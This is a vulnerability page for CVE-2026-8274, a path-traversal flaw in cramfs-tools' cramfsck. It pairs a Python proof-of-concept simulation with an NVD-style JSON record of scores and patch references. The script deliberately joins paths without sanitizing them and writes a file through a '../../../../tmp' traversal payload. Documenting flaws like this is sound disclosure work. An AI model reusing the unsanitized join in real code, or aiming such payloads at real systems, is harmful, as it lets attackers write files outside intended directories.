CVE-2026-8274

import os # Simulating the vulnerable logic in cramfsck.c do_directory function # This script demonstrates how a lack of path sanitization leads to traversal. def vulnerable_do_directory(file_path, extract_to="."): # Vulnerability: No sanitization of path traversal characters (../) # The function directly joins paths without resolving or checking boundaries. full_path = os.path.join(extract_to, file_path) # Normalize path to see where it actually points (for demonstration) real_path = os.path.realpath(full_path) print(f"[DEBUG] Intended extraction dir: {os.path.realpath(extract_to)}") print(f"[DEBUG] Resolved file path: {real_path}") # Check if the path escaped the intended directory if not real_path.startswith(os.path.realpath(extract_to)): print("[ALERT] Path Traversal Detected! Writing outside the intended directory.") else: print("[INFO] Path is safe.") # Simulating file operation (e.g., reading or creating) try: # In the real vulnerability, this would write to the filesystem print(f"[ACTION] Attempting to write to: {full_path}") with open(full_path, 'w') as f: f.write("Exploited content") print(f"[SUCCESS] File written at {real_path}") except Exception as e: print(f"[ERROR] {e}") # PoC Execution if __name__ == "__main__": # Attacker crafts a malicious path inside the filesystem image # using '../' to escape the current directory malicious_payload = "../../../../tmp/pwned_by_cve_2026_8274.txt" print("--- CVE-2026-8274 PoC Simulation ---") print(f"Payload: {malicious_payload}") print("Running cramfsck (simulated) on malicious image...") # Assuming the tool runs in a directory like /home/user/extract/ # The vulnerable function processes the malicious path vulnerable_do_directory(malicious_payload)

{"cve": {"id": "CVE-2026-8274", "sourceIdentifier": "[email protected]", "published": "2026-05-11T05:16:16.580", "lastModified": "2026-05-11T05:16:16.580", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in npitre cramfs-tools up to 2.1. Affected is the function do_directory of the file cramfsck.c of the component Directory Handler. Such manipulation leads to path traversal. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2 is able to address this issue. The name of the patch is 2fc492747115b24d8a07eddd27a2d45229cb273c. Upgrading the affected component is recommended."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/npitre/cramfs-tools/", "source": "[email protected]"}, {"url": "https://github.com/npitre/cramfs-tools/commit/2fc492747115b24d8a07eddd27a2d45229cb273c", "source": "[email protected]"}, {"url": "https://github.com/npitre/cramfs-tools/issues/12", "source": "[email protected]"}, {"url": "https://github.com/npitre/cramfs-tools/issues/12#issue-4307511739", "source": "[email protected]"}, {"url": "https://github.com/npitre/cramfs-tools/releases/tag/v2.2", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/810864", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362571", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362571/cti", "source": "[email protected]"}]}}